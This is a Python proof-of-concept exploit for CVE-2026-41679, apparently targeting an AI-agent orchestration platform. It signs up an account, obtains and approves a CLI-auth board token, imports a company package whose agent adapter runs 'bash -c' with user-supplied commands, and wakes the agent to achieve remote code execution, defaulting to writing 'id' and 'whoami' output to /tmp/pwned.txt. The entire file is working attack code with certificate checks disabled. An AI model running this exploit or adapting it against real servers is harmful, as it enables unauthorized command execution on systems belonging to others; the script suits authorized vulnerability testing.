import argparse

import requests
import urllib3

# Silences the warning urllib3 would otherwise emit for each verify=False request.
urllib3.disable_warnings(category=urllib3.exceptions.InsecureRequestWarning)

# Passed as verify= to every requests.post call below: the server certificate
# is never validated, so the password, session cookie and API token handled by
# this script are sent to whatever host answers at the target address.
VERIFY = False


def signup(target, name, email, password):
    """Register an account via ``POST {target}/api/auth/sign-up/email``.

    Sends name, email and password as a JSON body. Status codes 200 and 422
    are both treated as success; any other status raises ``Exception`` with
    the status code and response text.
    """
    response = requests.post(
        f"{target}/api/auth/sign-up/email",
        headers={"Content-Type": "application/json"},
        json={"email": email, "password": password, "name": name},
        verify=VERIFY,
    )
    # NOTE(review): 422 is presumably "account already exists" - confirm
    # against the API; the code only shows that it is tolerated.
    if response.status_code not in (200, 422):
        raise Exception(
            f"Couldnot create account, status: {response.status_code} - {response.text}."
        )


def signin(target, email, password):
    """Log in via ``POST {target}/api/auth/sign-in/email`` and return a cookie.

    Returns the part of the ``Set-Cookie`` response header before the first
    ``;`` (the ``name=value`` pair without attributes). Raises ``Exception``
    when the response has no ``Set-Cookie`` header.
    """
    response = requests.post(
        f"{target}/api/auth/sign-in/email",
        headers={"Content-Type": "application/json"},
        json={"email": email, "password": password},
        verify=VERIFY,
    )
    if "Set-Cookie" not in response.headers:
        raise Exception(
            f"Failed to login, status: {response.status_code} - {response.text}."
        )
    cookie_pair, _, _ = response.headers["Set-Cookie"].partition(";")
    return cookie_pair


def create_challenge(target):
    """Open a CLI-auth challenge and return ``(id, token, boardApiToken)``.

    Posts ``{"command": "test"}`` to ``{target}/api/cli-auth/challenges``.
    The request carries neither the session cookie nor an Authorization
    header. Raises ``Exception`` when any of the three expected keys is
    missing from the JSON response.
    """
    response = requests.post(
        f"{target}/api/cli-auth/challenges",
        headers={"Content-Type": "application/json"},
        json={"command": "test"},
        verify=VERIFY,
    )
    payload = response.json()
    expected_keys = ("id", "token", "boardApiToken")
    if not all(key in payload for key in expected_keys):
        raise Exception(
            f"Couldn't create challenge, status: {response.status_code} - {response.text}."
        )
    return payload["id"], payload["token"], payload["boardApiToken"]


def approve_challenge(target, id, token, session_cookie):
    """Approve challenge *id* with the signed-in account's session cookie.

    Posts ``{"token": token}`` to
    ``{target}/api/cli-auth/challenges/{id}/approve`` with the cookie in a
    ``Cookie`` header and ``Origin`` set to *target*. Returns nothing.

    For log review: the request pattern is a challenge-creation POST followed
    by this approve POST for the same challenge id.
    """
    response = requests.post(
        f"{target}/api/cli-auth/challenges/{id}/approve",
        headers={
            "Cookie": session_cookie,
            "Content-Type": "application/json",
            "Origin": target,
        },
        json={"token": token},
        verify=VERIFY,
    )
    # The body is decoded (a non-JSON reply raises here) but never inspected;
    # the listing elides its own checks at this point.
    response_data = response.json()
    # validations...
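def import_company(target, board_api_token, commands):
    """Import an inline company package and return the first agent's id.

    Posts to ``{target}/api/companies/import`` with *board_api_token* as a
    Bearer credential. The inline package holds three files: ``COMPANY.md``,
    ``agents/pwn/AGENTS.md`` and ``.paperclip.yaml``. The last one declares
    a ``process`` adapter whose command is ``bash`` with ``-c`` and
    *commands* as arguments.

    Raises ``Exception`` when the response lists no agents or when the first
    agent has no ``id``.
    """
    # Fixed identifiers sent with every run: company "attacker-corp" and agent
    # "pwn". Nothing visible in this script deletes them afterwards, so after
    # a successful import they are presumably still present on the instance.
    package_files = {
        "COMPANY.md": "---\nname: attacker-corp\nslug: attacker-corp\n---\nx",
        "agents/pwn/AGENTS.md": "---\nkind: agent\nname: pwn\nslug: pwn\nrole: engineer\n---\nx",
        ".paperclip.yaml": f"agents:\n pwn:\n icon: terminal\n adapter:\n type: process\n config:\n command: bash\n args:\n - -c\n - {commands}",
    }
    body = {
        "source": {"type": "inline", "files": package_files},
        "target": {"mode": "new_company", "newCompanyName": "attacker-corp"},
        "include": {"company": True, "agents": True},
        "agents": "all",
    }
    response = requests.post(
        f"{target}/api/companies/import",
        headers={
            "Content-Type": "application/json",
            "Origin": target,
            "Authorization": f"Bearer {board_api_token}",
        },
        json=body,
        verify=VERIFY,
    )
    payload = response.json()
    if "agents" not in payload or len(payload["agents"]) < 1:
        raise Exception(
            f"No agents created, status: {response.status_code} - {response.text}."
        )
    first_agent = payload["agents"][0]
    if "id" not in first_agent:
        raise Exception(
            f"Found agent doesn't have an id, status: {response.status_code} - {response.text}."
        )
    return first_agent["id"]


def trigger_agent(target, board_api_token, agent_id):
    """Request a wakeup of *agent_id* and return ``(id, status)``.

    Posts an empty JSON object to ``{target}/api/agents/{agent_id}/wakeup``
    with *board_api_token* as a Bearer credential. Raises ``Exception`` when
    the JSON response lacks ``id`` or ``status``.
    """
    response = requests.post(
        f"{target}/api/agents/{agent_id}/wakeup",
        headers={
            "Content-Type": "application/json",
            "Origin": target,
            "Authorization": f"Bearer {board_api_token}",
        },
        verify=VERIFY,
        json={},
    )
    payload = response.json()
    if "status" not in payload or "id" not in payload:
        raise Exception(
            f"Error triggering agent, no id or status returned, status: {response.status_code} - {response.text}."
        )
    return payload["id"], payload["status"]


if __name__ == "__main__":
    # Imported here so this block does not depend on the file's import header.
    import sys

    parser = argparse.ArgumentParser(description="This is a POC of CVE-2026-41679.")
    parser.add_argument(
        "-t", help="The endpoint of the target to check.", dest="target", required=True
    )
    parser.add_argument("-n", help="The name to use.", dest="name", default="attacker")
    parser.add_argument(
        "-e", help="The email-adress to use.", dest="email", default="attacker@evil.com"
    )
    parser.add_argument(
        "-p", help="The password to use.", dest="password", default="P@sswOrd123!"
    )
    # The default writes the output of `id` and `whoami` to /tmp/pwned.txt on
    # the host that runs the agent process.
    parser.add_argument(
        "-c",
        help="The commands to use.",
        dest="commands",
        default="id > /tmp/pwned.txt && whoami >> /tmp/pwned.txt",
    )
    args = parser.parse_args()

    try:
        signup(args.target, args.name, args.email, args.password)
        session_cookie = signin(args.target, args.email, args.password)
        challenge_id, token, board_api_token = create_challenge(args.target)
        approve_challenge(args.target, challenge_id, token, session_cookie)
        agent_id = import_company(args.target, board_api_token, args.commands)
        # Named run_id rather than id so the builtin is not shadowed.
        run_id, run_status = trigger_agent(args.target, board_api_token, agent_id)
    except Exception as ex:
        # Report failures on stderr with a non-zero exit status, so a wrapper
        # script can tell "check failed" apart from a completed run.
        print(str(ex), file=sys.stderr)
        sys.exit(1)
    else:
        # The verdict rests only on the wakeup response carrying id and
        # status; nothing here reads back evidence that the command ran.
        print(f"Vulnerable, was able to trigger RCE with id: {run_id}.")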